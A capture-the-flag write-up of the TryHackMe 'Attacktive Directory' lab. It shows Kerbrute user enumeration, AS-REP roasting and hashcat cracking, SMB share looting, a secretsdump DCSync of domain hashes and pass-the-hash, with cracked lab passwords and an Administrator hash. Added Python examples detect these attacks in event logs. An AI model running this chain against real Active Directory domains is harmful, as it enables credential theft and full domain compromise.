Accessing Attacktive Directory THM Write-up

Installing Impacket:

Whether you're on Kali 2019.3 or Kali 2021.1, Impacket can be a pain to install correctly. Here are some instructions that may help you install it correctly!

First, you will need to clone the Impacket GitHub repo onto your box. The following command will clone Impacket into /opt/impacket:

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket

After the repo is cloned, you will notice several install-related files: requirements.txt and setup.py. A commonly skipped file during the installation is setup.py; this actually installs Impacket onto your system so you can use it and not have to worry about any dependencies.

To install the Python requirements for Impacket:

pip3 install -r /opt/impacket/requirements.txt

Once the requirements have finished installing, we can then run the Python setup install script:

cd /opt/impacket/ && python3 ./setup.py install

After that, Impacket should be correctly installed and ready to use!

If you are still having issues, you can try the following script and see if this works:

sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/
sudo pip3 install .
sudo python3 setup.py install

Credit for proper Impacket install instructions goes to Dragonar#0923 in the THM Discord <3

Installing Bloodhound and Neo4j

Bloodhound is another tool that we'll be utilizing while attacking Attacktive Directory. We'll cover specifics of the tool later, but for now, we need to install two packages with Apt: bloodhound and neo4j. You can install them with the following command:

apt install bloodhound neo4j

Now that it's done, you're ready to go!

Troubleshooting

If you are having issues installing Bloodhound and Neo4j, try issuing the following command:

apt update && apt upgrade

Enumeration with nmap and Enum4linux:

After the nmap scan, we see that ports 139 and 445 are open, so we can use "enum4linux" to see what domains are available.

The "enum4linux -a" option runs all the common options.

nmap scan result

Nmap scan report for 10.10.100.215
Host is up (0.13s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 26.97 seconds
❯ nmap -A 10.10.100.215
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-16 12:28 EST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 6.75% done; ETC: 12:29 (0:00:14 remaining)
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 37.18% done; ETC: 12:29 (0:00:07 remaining)
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 99.99% done; ETC: 12:29 (0:00:00 remaining)
Nmap scan report for 10.10.100.215
Host is up (0.14s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-16 17:29:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2022-01-16T17:29:27+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-01-15T17:13:49
|_Not valid after:  2022-07-17T17:13:49
|_ssl-date: 2022-01-16T17:29:35+00:00; 0s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-01-16T17:29:27
|_  start_date: N/A

Service detection performed

Enumerating with Kerberos

A whole host of other services are running, including Kerberos. Kerberos is a key authentication service within Active Directory. With this port open, we can use a tool called Kerbrute (by Ronnie Flathers @ropnop) to brute force discovery of users, passwords and even password spray!

Download the older version (1.0.2) as the userenum option is available and 1.0 was not stable.

For this box, a modified User List and Password List will be used to cut down on time of enumeration of users and password hash cracking. It is NOT recommended to brute force credentials due to account lockout policies that we cannot enumerate on the domain controller.

Updated /etc/hosts with the domain name (spookysec.local).

I've specified the domain controller as it was giving me an error without it.

./kerbrute userenum -d spookysec.local --dc spookysec.local kerberoesuser.txt

Introduction

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASREPRoasting occurs when a user account has the privilege "Does not require Pre-Authentication" set. This means that the account does not need to provide valid identification before requesting a Kerberos ticket for the specified user account.

Retrieving Kerberos Tickets

Impacket has a tool called "GetNPUsers.py" (located in impacket/examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that's necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.
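Seen from the domain controller, both the Kerbrute user enumeration and the pre-authentication-less ticket request leave Event ID 4768 records. The triage below is an added example, not part of the original write-up: it assumes Kerberos Authentication Service auditing is enabled for success and failure, and the events, addresses and every user name except svc-admin are constructed.

```python
from collections import defaultdict

UNKNOWN_PRINCIPAL = "0x6"  # KDC_ERR_C_PRINCIPAL_UNKNOWN: no such user
RC4_HMAC = "0x17"          # etype 23, the type in the $krb5asrep$23$ hash

def ev(user, ip, status="0x0", etype="0x12", preauth="2"):
    """Build one constructed 4768 record with only the fields used below."""
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "TicketEncryptionType": etype, "PreAuthType": preauth}

# Constructed sample data: addresses and most user names are made up.
SCANNER = "::ffff:10.0.5.99"
EVENTS = [ev("jsmith", "::ffff:10.0.5.23")]  # normal logon, AES, pre-auth
EVENTS += [ev(u, SCANNER, status="0x6", etype="0xffffffff", preauth="-")
           for u in ("alice", "bob", "carol", "dave", "erin", "frank")]
EVENTS.append(ev("svc-admin", SCANNER, etype="0x17", preauth="0"))

def enumeration_sources(events, threshold=5):
    """Map source IP -> unknown user names it requested, if >= threshold."""
    unknown = defaultdict(set)
    for e in events:
        if e["Status"].lower() == UNKNOWN_PRINCIPAL:
            unknown[e["IpAddress"]].add(e["TargetUserName"].lower())
    return {ip: sorted(names) for ip, names in unknown.items()
            if len(names) >= threshold}

def preauth_less_tgts(events):
    """List (user, source IP, used_rc4) for TGTs issued without pre-auth."""
    return [(e["TargetUserName"], e["IpAddress"],
             e["TicketEncryptionType"].lower() == RC4_HMAC)
            for e in events
            if e["Status"].lower() == "0x0" and e["PreAuthType"] == "0"]

if __name__ == "__main__":
    for ip, names in enumeration_sources(EVENTS).items():
        print(f"user enumeration from {ip}: {len(names)} unknown principals")
    for user, ip, rc4 in preauth_less_tgts(EVENTS):
        print(f"TGT without pre-auth for {user} from {ip} (RC4: {rc4})")
```

Any account returned by preauth_less_tgts is one to review: clearing "Do not require Kerberos preauthentication" on it removes the exposure, and a long random password limits what an offline guess can recover.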

Let's determine the hash type by visiting the hashcat wiki page.

After entering the first part of the hash, I was able to see that it's "Kerberos 5, etype 23, AS-REP" and has the 18200 hash-mode.

Create a hash file and a password list file to crack it

hashcat -m 18200 hash.txt pass.txt
Dictionary cache built:
* Filename..: pass.txt
* Passwords.: 70189
* Bytes.....: 569237
* Keyspace..: 70189
* Runtime...: 0 secs

$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:f0a97f889f9fbbcd6806ba1d47dbdd90$f601dc3e42fc28c4ba6500fc642c6ffc7863d9baa52aa80af85188cb80741fcedf6526868e61170cf36e4c820a299495a2e182e898de7be3cb1b1aebb3cc90c88ff694e0ac3dec1ddfd87db8f0f4acebbdda3ba005cc9bfb66ab7964d5afc1d06039e4cc479fc8c22b9f98e869acb5bf0b68cbd7fa42e378a2fcee4357fa83065cfd37c0792a3494727227a4e665f3e87da1b6ca8c2a0db21e985fadf89675f1038b20cb4583b56d7a3221515765d95cf8d7583a4380930feb0aaf3b6e479bc3f63cf71764fb47c67bfaf492e915c50a7d21e32ceed369bfff8d660072ac74277d6b7b62f96200f72cd97b929470930aaa42:management2005
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:f0a97f889f9...0aaa42
Time.Started.....: Sun Jan 16 13:29:05 2022 (0 secs)
Time.Estimated...: Sun Jan 16 13:29:05 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (pass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1455.8 kH/s (0.42ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 7168/70189 (10.21%)
Rejected.........: 0/7168 (0.00%)
Restore.Point....: 6144/70189 (8.75%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: horoscope -> frida
Hardware.Mon.#1..: Util: 25%

Cracked it!

Discovering File-shares with smbclient

Enumeration:

With a user's account credentials we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out.

smbclient -L //10.10.162.190 -U svc-admin

This will list the file shares within.

Enumerate the resulting shares:

smbclient //10.10.162.190/backup -U svc-admin

Juicy file found!

Use the smb command "get" to download it to the attacker's machine.

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

This looks like base64

Decode this by typing

base64 -d backup_credentials.txt

Domain Privilege Escalation

Elevating Privileges within the Domain

Now that we have new user account credentials, we may have more privileges on the system than before. The username of the account "backup" gets us thinking. What is this the backup account for?

Well, it is the backup account for the Domain Controller. This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes.

Knowing this, we can use another tool within Impacket called "secretsdump.py". This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.

impacket-secretsdump backup@spookysec.local:backup2517860

I couldn't get this to work for a min since I was adding "%" at the end which wasn't the part of the password :(

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
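The DRSUAPI replication shown above is visible to defenders as Event ID 4662 records carrying the directory replication control-access rights. The check below is an added example, not part of the original write-up: it assumes Directory Service Access auditing is enabled on the domain object, that ATTACKTIVEDIREC$ is the domain controller's machine account (derived from the NetBIOS name in the nmap output), and the events themselves are constructed.

```python
import re

# Control-access rights a DCSync-style replication request exercises.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Constructed 4662 records reduced to two fields. "someuser" and the
# near-zero GUID are made up.
EVENTS = [
    {"SubjectUserName": "ATTACKTIVEDIREC$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "someuser",
     "Properties": "{00000000-0000-0000-0000-000000000001}"},
    {"SubjectUserName": "backup",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "backup",
     "Properties": "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
]

def dcsync_suspects(events, dc_accounts):
    """Map account -> replication rights used, for accounts that are not DCs."""
    known = {a.lower() for a in dc_accounts}
    hits = {}
    for e in events:
        user = e["SubjectUserName"].lower()
        if user in known:
            continue  # domain controllers replicate with each other legitimately
        rights = {REPL_RIGHTS[g.lower()]
                  for g in GUID_RE.findall(e["Properties"])
                  if g.lower() in REPL_RIGHTS}
        if rights:
            hits.setdefault(user, set()).update(rights)
    return {user: sorted(r) for user, r in hits.items()}

if __name__ == "__main__":
    for user, rights in dcsync_suspects(EVENTS, {"ATTACKTIVEDIREC$"}).items():
        print(f"replication rights used by non-DC account {user}: {rights}")
```

The matching hardening step is to audit which principals hold these two rights on the domain object and remove them from any account, such as a backup service account, that does not need to replicate the directory.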

Try the pass-the-hash method to elevate privileges!

Use the tool Evil-WinRM.

This room was so much fun!!
